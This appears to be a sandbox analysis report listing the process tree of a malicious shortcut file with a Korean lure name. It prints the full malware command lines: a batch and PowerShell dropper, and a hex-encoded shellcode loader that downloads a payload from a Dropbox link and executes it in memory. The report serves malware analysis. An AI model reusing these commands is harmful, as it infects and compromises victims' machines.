| ZeroBOX

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "haKxmscgXfAf" "C:\Users\test22\AppData\Local\Temp\주요도시 시장가격 조사2023.lnk"
3000
- cmd.exe "C:\Windows\SysWOW64\cmd.exe" /k echo SET a=power>C:\Users\Public\282310.bat&&echo SET b=shell.exe>>C:\Users\Public\282310.bat&&echo SET M=%a%%b%>>C:\Users\Public\282310.bat&&echo call %M% -windowstyle hidden "$dirPath=Get-Location;if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'}; $lnkPath=Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x032A1EB6} | Select-Object -ExpandProperty FullName; $lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x00001304, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x00008DA6;$lnkFile.Read($pdfFile, 0, 0x00008DA6);$PdfPath = $lnkPath.Replace('.lnk','.xlsx');sc $PdfPath $pdfFile -Encoding Byte;& $PdfPath;$lnkFile.Seek(0x0000A0AA,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x00000D18;$lnkFile.Read($exeFile, 0, 0x00000D18);$exePath=$env:public+'\'+'281023.bat';sc $exePath $exeFile -Encoding Byte;& $exePath;remove-item -path $exePath -force;$lnkFile.Close();remove-item -path $lnkPath -force;">>C:\Users\Public\282310.bat&& start /min C:\Users\Public\282310.bat&&exit
  932
  - cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\282310.bat
    2272
    - powershell.exe powershell.exe -windowstyle hidden "$dirPath=Get-Location;if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'}; $lnkPath=Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x032A1EB6} | Select-Object -ExpandProperty FullName; $lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x00001304, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x00008DA6;$lnkFile.Read($pdfFile, 0, 0x00008DA6);$PdfPath = $lnkPath.Replace('.lnk','.xlsx');sc $PdfPath $pdfFile -Encoding Byte;& $PdfPath;$lnkFile.Seek(0x0000A0AA,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x00000D18;$lnkFile.Read($exeFile, 0, 0x00000D18);$exePath=$env:public+'\'+'281023.bat';sc $exePath $exeFile -Encoding Byte;& $exePath;remove-item -path $exePath -force;$lnkFile.Close();remove-item -path $lnkPath -force;"
      2408
      - EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde
        1624
      - cmd.exe cmd /c ""C:\Users\Public\281023.bat""
        1728
        
        cmd.exe c:\\Windows\\SysWOW64\\cmd.exe /c for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a -windowstyle hidden -command "$red ="$yellow="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F646C2E64726F70626F7875736572636F6E74656E742E636F6D2F73636C2F66692F68377035616561726B627136726E62326F683633332F32303233313032385F73656C63612E7A69703F726C6B65793D38676D6E6E6672657A7A32766E6E64737231637A373831637626646C3D30223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$chemble="""""";for($i=0;$i -le $yellow.Length-2;$i=$i+2){$MMOMM=$yellow[$i]+$yellow[$i+1];$chemble= $chemble+[char]([convert]::toint16($MMOMM,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($chemble));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($red));while(true){}"
        1472
        
        cmd.exe C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od
        2572
        
        powershell.exe C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -command "$red ="$yellow="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F646C2E64726F70626F7875736572636F6E74656E742E636F6D2F73636C2F66692F68377035616561726B627136726E62326F683633332F32303233313032385F73656C63612E7A69703F726C6B65793D38676D6E6E6672657A7A32766E6E64737231637A373831637626646C3D30223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$chemble="""""";for($i=0;$i -le $yellow.Length-2;$i=$i+2){$MMOMM=$yellow[$i]+$yellow[$i+1];$chemble= $chemble+[char]([convert]::toint16($MMOMM,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($chemble));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($red));while(true){}"
        1300
        
        csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\xj4njtpx.cmdline"
        3040
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RES629E.tmp" "c:\Users\test22\AppData\Local\Temp\CSC628D.tmp"
        2772
        
        csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\sbjraxxu.cmdline"
        2172
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RES6463.tmp" "c:\Users\test22\AppData\Local\Temp\CSC6452.tmp"
        2348
        
        csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\qceyv3jp.cmdline"
        1884
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RES6638.tmp" "c:\Users\test22\AppData\Local\Temp\CSC6627.tmp"
        2428
        
        csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\qwrnexiw.cmdline"
        2524
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RES680C.tmp" "c:\Users\test22\AppData\Local\Temp\CSC67FC.tmp"
        2440
explorer.exe C:\Windows\Explorer.EXE
1236

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents